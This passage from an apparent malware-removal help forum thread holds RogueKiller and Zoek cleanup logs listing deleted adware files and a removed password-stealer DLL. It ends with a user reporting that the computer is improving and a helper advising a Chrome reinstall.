[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\bearer -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\ES.png -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\iconengines\qsvgicon.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\iconengines -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qgif.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qicns.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qico.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qjpeg.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qsvg.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qtga.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qtiff.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qwbmp.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qwebp.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\libeay32.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\libEGL.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\libGLESV2.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\libssl32.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\opengl32sw.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\pepflashplayer.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\platforms\qwindows.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\platforms -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\position\qtposition_geoclue.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\position\qtposition_positionpoll.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\position\qtposition_serialnmea.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\position\qtposition_winrt.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\position -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\printsupport\windowsprintersupport.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\printsupport -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\proxycheck.exe -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Core.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Gui.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Network.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Positioning.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5PrintSupport.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Qml.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Quick.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5QuickWidgets.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5SerialPort.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Sql.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Svg.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5WebChannel.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5WebEngineCore.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5WebEngineWidgets.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Widgets.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Xml.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\qtwebkit-avc-plugin.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\resources\icudtl.dat -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\resources\qtwebengine_resources.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\resources\qtwebengine_resources_100p.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\resources\qtwebengine_resources_200p.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\resources\resources.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\resources -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\sqldrivers\qsqlite.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\sqldrivers\qsqlmysql.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\sqldrivers\qsqlodbc.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\sqldrivers\qsqlpsql.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\sqldrivers -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\ssleay32.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\tls.dat -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\ca.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\en-GB.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\en-US.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\fr.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\he.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\ja.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\ru.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\uk.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\zh-CN.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\zh-TW.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\US.png -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\CONFIG.JSON -> Deleted
[PUP.Amonetize][File] C:\Users\Jpoch\AppData\Local\Temp\dd-37146-936-f9988-201d17ce4a2e4\ADVOFKIWWU.exe -> Deleted
[Pwd.Stealer][File] C:\Program Files (x86)\Google\Chrome\Application\winhttp.dll -> Removed at reboot [5]
[PUP.YahooPowered][File] C:\Users\Jpoch\AppData\Roaming\Mozilla\Firefox\Profiles\eggor1db.default\searchplugins\YAHOO! POWERED SEARCH.XML -> Deleted
 
¤¤¤ WMI : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD10EZEX-60M2NA0 +++++
--- User ---
[MBR] ddaa32bb8d2d1edee03613fab80d2fe3
[BSP] a07e8b3550ee83d9c7c223cf1cd7f92c : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 
+++++ PhysicalDrive1: ADATA SP610 +++++
--- User ---
[MBR] 2bf09fd3323152756de5db48f7a40a8e
[BSP] 79622432022f49b832f926bf0763e6dd : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 350 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 718848 | Size: 121302 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 249145344 | Size: 450 MB
User = LL1 ... OK
User = LL2 ... OK
 
Final Scan (#3)
 
RogueKiller V12.11.25.0 (x64) [Nov 20 2017] (Free) by Adlice Software
 
Operating System : Windows 10 (10.0.15063) 64 bits version
Started in : Normal mode
User : Jpoch [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 11/24/2017 13:53:23 (Duration : 00:15:56)
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 0 ¤¤¤
 
¤¤¤ Tasks : 0 ¤¤¤
 
¤¤¤ Files : 0 ¤¤¤
 
¤¤¤ WMI : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD10EZEX-60M2NA0 +++++
--- User ---
[MBR] ddaa32bb8d2d1edee03613fab80d2fe3
[BSP] a07e8b3550ee83d9c7c223cf1cd7f92c : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 
+++++ PhysicalDrive1: ADATA SP610 +++++
--- User ---
[MBR] 2bf09fd3323152756de5db48f7a40a8e
[BSP] 79622432022f49b832f926bf0763e6dd : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 350 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 718848 | Size: 121302 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 249145344 | Size: 450 MB
User = LL1 ... OK
User = LL2 ... OK
 
 
-----

Zoek Tool
 
 
Zoek.exe v5.0.0.1 Updated 24-October-2017
Tool run by Jpoch on Fri 11/24/2017 at 14:25:14.62.
Microsoft Windows 10 Home 10.0.15063  x64
Running in: Normal Mode No Internet Access Detected
Launched: C:\Users\Jpoch\Downloads\zoek.exe [Scan all users] [Script inserted] 
 
==== System Restore Info ======================
 
11/24/2017 2:25:41 PM Zoek.exe System Restore Point Created Successfully.
 
==== Empty Folders Check ======================
 
C:\PROGRA~2\VMware deleted successfully
C:\PROGRA~2\Zemana AntiMalware deleted successfully
C:\PROGRA~2\COMMON~1\Merge Modules deleted successfully
C:\PROGRA~3\Comms deleted successfully
C:\PROGRA~3\Malwarebytes' Anti-Malware (portable) deleted successfully
C:\PROGRA~3\SoftwareDistribution deleted successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\LocalLow deleted successfully
C:\Users\defaultuser0\AppData\Local\VirtualStore deleted successfully
C:\Users\Jpoch\AppData\Local\Adobe deleted successfully
C:\Users\Jpoch\AppData\Local\DBG deleted successfully
C:\Users\Jpoch\AppData\Local\Notepad++ deleted successfully
C:\Users\Jpoch\AppData\Local\PackageStaging deleted successfully
C:\Users\Jpoch\AppData\Local\TSVNCache deleted successfully
 
==== FireFox Fix ======================
 
Deleted from C:\Users\Jpoch\AppData\Roaming\Mozilla\Firefox\Profiles\lj3u1kkm.default-1511297172688\prefs.js:
 
Added to C:\Users\Jpoch\AppData\Roaming\Mozilla\Firefox\Profiles\lj3u1kkm.default-1511297172688\prefs.js:
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");
 
==== Batch Command(s) Run By Tool======================
 
 
==== Firefox Start and Search pages ======================
 
ProfilePath: C:\Users\Jpoch\AppData\Roaming\Mozilla\Firefox\Profiles\lj3u1kkm.default-1511297172688
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");
 
==== Firefox Extensions ======================
 
AppDir: C:\Program Files (x86)\Mozilla Firefox
- Undetermined - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi
 
==== Firefox Plugins ======================
 
 
==== Set IE to Default ======================
 
Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
 
New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
 
==== All HKLM and HKCU SearchScopes ======================
 
HKLM\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKLM\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
HKLM\Wow6432Node\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKLM\Wow6432Node\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
HKCU\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKCU\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02
 
==== Reset Google Chrome ======================
 
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Default\Preferences was reset successfully
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences was reset successfully
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Preferences was reset successfully
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Preferences.bak was reset successfully
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Secure Preferences was reset successfully
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Secure Preferences.bak was reset successfully
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Default\Web Data was reset successfully
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Web Data was reset successfully
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Web Data-journal was reset successfully
 
==== Empty IE Cache ======================
 
C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\Jpoch\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\Jpoch\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\WINDOWS\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
 
==== Empty FireFox Cache ======================
 
C:\Users\Jpoch\AppData\Local\Mozilla\Firefox\Profiles\lj3u1kkm.default-1511297172688\cache2 emptied successfully
 
==== Empty Chrome Cache ======================
 
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Cache emptied successfully
 
==== Empty All Flash Cache ======================
 
No Flash Cache Found
 
==== Empty All Java Cache ======================
 
Java Cache cleared successfully
 
==== C:\zoek_backup content ======================
 
C:\zoek_backup (files=0 folders=0 0 bytes)
 
==== Empty Temp Folders ======================
 
C:\WINDOWS\Temp will be emptied at reboot
 
==== After Reboot ======================
 
==== Empty Temp Folders ======================
 
C:\WINDOWS\Temp successfully emptied
C:\Users\Jpoch\AppData\Local\Temp successfully emptied
 
==== Empty Recycle Bin ======================
 
C:\$RECYCLE.BIN successfully emptied
 
==== EOF on Fri 11/24/2017 at 14:29:02.57 ======================
 
 
After the Zoek restart it seems to be running a lot smoother. On startup, it didn't seem to stress the computer out as much, and the apps loaded a lot quicker than they had prior.
 
Sadly, Firefox and Chrome were doing the same thing, but I am onto the reinstall steps you've provided and will update further.
 
I have to go to work soon, but am hoping to update more before then. We are seeing a lot of progress, but I haven't had the chance to fully play around on the computer to see how it's acting.

Edited by Description, 24 November 2017 - 05:33 PM.


#8 nasdaq

nasdaq

  • Malware Response Team
  • 40,238 posts
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:04:33 AM

Posted 25 November 2017 - 08:37 AM

Start with Chrome. It could be a Sync issue.

#9 Description

Description
  • Topic Starter

  • Members
  • 7 posts
  • Local time:03:33 AM

Posted 28 November 2017 - 08:15 AM

Got Google reinstalled, and you were right about the sync issue. Sorry for the late response; real busy with work and forgot a bunch of my PW/acc with the reset XD

 

Seeming to get everything back to normal, and going to do the same with firefox.

I had a hard time finding how to export my bookmarks with that link, but thankfully it wasn't too hard. You have been super amazing and I really appreciate your help.
